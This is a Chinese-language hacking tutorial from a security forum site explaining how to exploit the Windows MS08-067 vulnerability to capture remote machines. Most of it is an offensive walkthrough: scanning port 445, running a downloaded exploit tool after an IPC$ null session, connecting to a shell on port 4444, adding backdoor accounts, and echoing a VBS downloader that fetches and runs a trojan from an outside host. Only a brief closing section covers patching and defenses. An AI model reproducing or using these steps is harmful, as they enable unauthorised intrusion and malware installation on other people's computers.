首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

风靡全球的Ms08-067漏洞抓鸡大曝光


http://www.gipsky.com/
曾几何时,冲击波病毒在一周内攻击了全球`的Windows用户,使受害者电脑反复重起。而如今Ms08-067漏洞的出现,很有可能会赶超冲击波病毒,目前有不少菜鸟也已开始对其漏洞实施攻击了,因此受此漏洞危害的用户将会越来越多,下面笔者将会客串一把黑客,来玩玩这风靡全球的Ms08-067漏洞,同时还将会把其防御措施“奉贤”给大家,以免我们自己因其漏洞而被他人入侵。

 <STRONG> 一、Ms08-067漏洞简介</STRONG>

  曾经令人谈虎色变的冲击波病毒攻击,是由于RPC漏洞所造成的,而这次Ms08-067远程溢出攻击,也是没有例外。在Windows操作系统下的Server服务在处理RPC请求过程中存在的一个严重漏洞,使远程攻击者可以通过发送恶意RPC请求触发这个溢出,导致完全入侵用户系统,并以SYSTEM权限执行任意指令并获取数据,造成系统失窃及系统崩溃等问题的出现。

  受Ms08-067远程溢出漏洞影响的系统非常多,除了Windows Server 2008 Core以外所有Windows系统,包括Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本也都会受到攻击,攻击者利用这个漏洞无需通过认证运行任意代码,同时该漏洞还有可能被蠕虫利用的危险,进行大规模的溢出攻击。

<STRONG>二、寻找含有Ms08-067溢出漏洞的电脑主机</STRONG>

  虽然涉及Ms08-067漏洞的系统有很多,但不是每台机器都会含有此漏洞,甚至有些朋友还将漏洞打上了补丁,所以要想提高远程溢出的效率,还得先对主机进行踩点。由于是RPC服务触发的漏洞,并且这个服务所开放的端口为445,因此只要利用工具扫445端口的主机,就可找到可以远程溢出的主机,这里以大家熟悉的X-scan扫描工具为例。

  打开“X-scan”客户端程序,依次单击“设置”→“扫描参数”选项,在弹出的“扫描参数”对话框内,指定你想要扫描的一个固定的电脑IP或者IP地址段(如图1)。









设定扫描IP地址完毕后,依次选择左侧“全局设置”→“扫描模块”选项,由于我们要扫描的是主机端口,所以为了提高软件的扫描速度,这里只勾选“开放服务”选项,然后切入至左侧“端口相关设置”标签,从中输入想要扫描的445端口(如图2)。











操作完毕后,依次选择“全局设置”→“其他设置”选项,将扫描类型设置为“无条件扫描”,这样就可以对安装了防火墙的主机进行检测扫描了,最后单击“确定”按钮,使以上设置生效。同时还会顺“原路”返回到软件操作界面,从中在工具栏上单击“开始扫描”按钮,就可按照自己方案,对其设置的IP段主机进行扫描,并且等到扫描完毕后,还会自动弹出一个对话框窗口,里面会显示出本次扫描的结果信息。

<STRONG>三、利用Ms08-067工具进行溢出攻击</STRONG>

  当漏洞主机确定后,我们需要从网上下载Ms08-067远程溢出漏洞工具(下载地址:Http://www.youxia.org/upload/2008/10/Ms08-067.rar),然后将其压缩包解压到C盘根目录下。在依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“CMD”命令回车,将CMD命令提示窗口打开。而后跳转到C盘根目录下,并且进入到溢出工具所在的文件夹Release目录,从中直接输入Ms08-067.exe回车,可显示出工具溢出的相关格式,例如显示的Ms08-067.exe ,我们只要把server换成想要攻击的IP主机,就可以进行远程溢出了(图3)。









不过在攻击之前,需要与受害主机建立空连接,例如攻击的主机IP是192.168.1.101,我们建立空连接的命令就为net use \\192.168.1.101\ipc$,然后在执行溢出攻击的Ms08-067.exe 192.168.1.101命令,即可开始对其主机进行远程溢出。当溢出完毕后,返回的结果为SMB connect ok! Send payload over!则是溢出成功的信息提示,反之与其不一样的信息就是溢出失败的信息提示。当远程溢出成功后,我们继续在CMD命令行处,输入telnet IP地址 4444命令,与刚才溢出成功的主机4444端口进行连接,例如telnet 192.168.1.66 4444回车后,就可成功远程登录192.168.1.66主机,从而就可以在其远程主机任意添加自己的后门账号(如图4)。





<STRONG>四、编写VBS脚本扩大战果</STRONG>

  尽管已经成功溢出,并且可以登录远程主机,但是命令行方式的操控,对于我们菜鸟来说,还是很不习惯的,所以得想方设法的将木马上传到远程主机并让其运行,方可直观操作。

  这里继续在远程主机输入命令,其建立脚本文件的命令如下:

  echo iLocal=Lcase(wscript.arguments(1))>wenpeng.vbe

  echo iremote=Lcase(wscript.arguments(0))>>wenpeng.vbe

  echo set xpost=createobject(“microsoft.xmlhttp”)>>wenpeng.vbe

  echo xpost.open “Get”,iremote,0>>wenpeng.vbe

  echo xpost.send() >>wenpeng.vbe

  echo set sget=Createobject(“adodb.stream”)>>wenpeng.vbe

  echo sget.mode=3>>wenpeng.vbe

  echo sget.type=1>>wenpeng.vbe

  echo sget.open()>>wenpeng.vbe

  echo sget.write(xpost.responsebody)>>wenpeng.vbe

  echo sget.savetofile ilocal,2>>wenpeng.vbe

  逐个执行完以上命令语句完毕后,此时就会在远程主机的当前目录下建立一个wenpeng.vbe的脚本文件。接下来将我们事先准备上传到空间的木马,下载到远程主机并执行即可,这里笔者木马存放的位置假设是http://www.show33.com:88/muma.exe,因此在远程主机里下载木马的命令,就应该是cscript wenpeng.vbe http:// www.show33.com:88/muma.exe wenpeng.exe。解释一下这句命令语句,cscript wenpeng.vbe代表执行wenpeng.vbe脚本,后面所跟的网址是想要下载的木马地址,wenpeng.exe则是木马下载后在本机的名称。执行脚本语句完毕后,输入wenpeng.exe回车后,即可使其木马文件在远程主机运行,此时你在利用本机的木马客户端程序与其服务端建立连接,就可非常直观的遥控这台肉鸡了。

 <STRONG> 五、防范Ms08-067远程溢出攻击</STRONG>

  由于这个漏洞是致命的,所以一旦被入侵后果将不堪设想,因此我们可以微软的官方站点,下载编号为KB958644的补丁,对其漏洞进行修补。再则通过关闭Computer browser、server、workstation这三个服务关闭,也可防止黑客远程溢出攻击,当然安装防火墙将安全级别设置为高级,也是一种防止黑客入侵的不错选择。
<< 教你轻松查看QQ空间加密后的好友图片 不多见的免杀技巧 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号